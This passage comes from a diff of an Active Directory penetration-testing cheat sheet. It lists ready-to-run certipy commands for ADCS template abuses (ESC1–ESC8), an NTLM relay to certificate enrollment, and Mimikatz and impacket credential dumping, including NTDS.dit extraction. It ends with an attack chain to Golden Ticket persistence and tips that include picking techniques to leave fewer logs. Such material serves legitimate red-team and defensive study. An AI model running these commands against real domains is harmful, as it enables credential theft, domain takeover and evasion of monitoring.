certipy req -u <user>@<domain> -p <pass> -ca <CA_name> -template <template_name> \
|
|
231
|
+
-upn administrator@<domain> -dc-ip <dc_ip>
|
|
232
|
+
|
|
233
|
+
# Authenticate with certificate
|
|
234
|
+
certipy auth -pfx administrator.pfx -dc-ip <dc_ip>
|
|
235
|
+
|
|
236
|
+
### ESC2 — Any Purpose EKU
|
|
237
|
+
|
|
238
|
+
Same as ESC1 but template has "Any Purpose" or no EKU.
|
|
239
|
+
|
|
240
|
+
### ESC4 — Vulnerable Certificate Template ACL
|
|
241
|
+
|
|
242
|
+
# Template with WriteDACL → modify template to ESC1
|
|
243
|
+
certipy template -u <user>@<domain> -p <pass> -template <template> -save-old -dc-ip <dc_ip>
|
|
244
|
+
# Modify template to allow SAN, then exploit as ESC1
|
|
245
|
+
|
|
246
|
+
### ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2
|
|
247
|
+
|
|
248
|
+
CA flag allows SAN on any template:
|
|
249
|
+
|
|
250
|
+
certipy req -u <user>@<domain> -p <pass> -ca <CA> -template User \
|
|
251
|
+
-upn administrator@<domain>
|
|
252
|
+
|
|
253
|
+
### ESC8 — AD CS Web Enrollment NTLM Relay
|
|
254
|
+
|
|
255
|
+
# Relay to HTTP enrollment endpoint
|
|
256
|
+
impacket-ntlmrelayx -t http://<CA_server>/certsrv/certfnsh.asp \
|
|
257
|
+
--adcs --template DomainController
|
|
258
|
+
|
|
259
|
+
# Use obtained certificate for DCSync or PtT
|
|
260
|
+
|
|
261
|
+
---
|
|
262
|
+
|
|
263
|
+
## Credential Extraction (Post-Compromise)
|
|
264
|
+
|
|
265
|
+
# Mimikatz in memory
|
|
266
|
+
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
|
|
267
|
+
|
|
268
|
+
# LSASS dump (remote)
|
|
269
|
+
impacket-lsadump <domain>/<user>:<pass>@<target>
|
|
270
|
+
|
|
271
|
+
# SAM/SYSTEM registry dump
|
|
272
|
+
impacket-secretsdump <domain>/<user>:<pass>@<target>
|
|
273
|
+
|
|
274
|
+
# NTDS.dit extraction (DC)
|
|
275
|
+
impacket-secretsdump <domain>/<user>:<pass>@<dc_ip> -just-dc
|
|
276
|
+
|
|
277
|
+
---
|
|
278
|
+
|
|
279
|
+
## Key Tools
|
|
280
|
+
|
|
281
|
+
BloodHound: bloodhound-python (collection) + BloodHound CE (visualization)
|
|
282
|
+
Impacket: GetUserSPNs, GetNPUsers, secretsdump, psexec, ntlmrelayx, ticketer
|
|
283
|
+
Certipy: certipy find / req / auth / template / shadow
|
|
284
|
+
netexec: smb/ldap/winrm enum, PTH, spray, modules
|
|
285
|
+
Rubeus: kerberoast, asreproast, triage, dump, ptt, asktgt
|
|
286
|
+
Responder: LLMNR/NBT-NS poisoning, hash capture
|
|
287
|
+
Mimikatz: logonpasswords, dcsync, golden/silver ticket, ptt
|
|
288
|
+
Kerbrute: user enum, password spray over Kerberos
|
|
289
|
+
|
|
290
|
+
---
|
|
291
|
+
|
|
292
|
+
## Attack Chain (Quick Reference)
|
|
293
|
+
|
|
294
|
+
Unauthenticated → LLMNR poisoning (Responder) → NTLMv2 hash → crack → valid creds
|
|
295
|
+
Valid creds → Kerberoast high-priv SPNs → crack → service account creds
|
|
296
|
+
Valid creds → BloodHound → ACL path to DA → abuse WriteDACL/GenericAll → DA
|
|
297
|
+
Valid creds → ADCS ESC1 → cert as Admin → DCSync → domain hashes → Golden Ticket
|
|
298
|
+
DA creds → DCSync → krbtgt hash → Golden Ticket → persistent domain control
|
|
299
|
+
|
|
300
|
+
---
|
|
301
|
+
|
|
302
|
+
## Pro Tips
|
|
303
|
+
|
|
304
|
+
1. Always run BloodHound first — shortest path queries reveal non-obvious attack paths
|
|
305
|
+
2. Kerberoasting is noisy; target only high-value SPNs (SQL admin, web service, backup)
|
|
306
|
+
3. AS-REP roasting is zero-credential — always check even before getting credentials
|
|
307
|
+
4. ADCS ESC1/ESC8 are extremely common and often overlooked — certipy find before anything else
|
|
308
|
+
5. ACL abuse chains (WriteDACL → GenericAll → password reset) leave fewer logs than DCSync
|
|
309
|
+
6. Don't spray passwords — check the password policy first to avoid lockouts
|
|
310
|
+
7. SMB signing must be off for relay attacks — netexec gen-relay-list first
|
|
311
|
+
|
|
312
|
+
## Summary
|
|
313
|
+
|
|
314
|
+
AD compromise = credential collection + path finding (BloodHound) + privilege escalation chain. The end goal is DCSync (domain hash dump) or ADCS Golden Cert for persistent access. ADCS is the most underutilized attack path and often the fastest route to DA.
|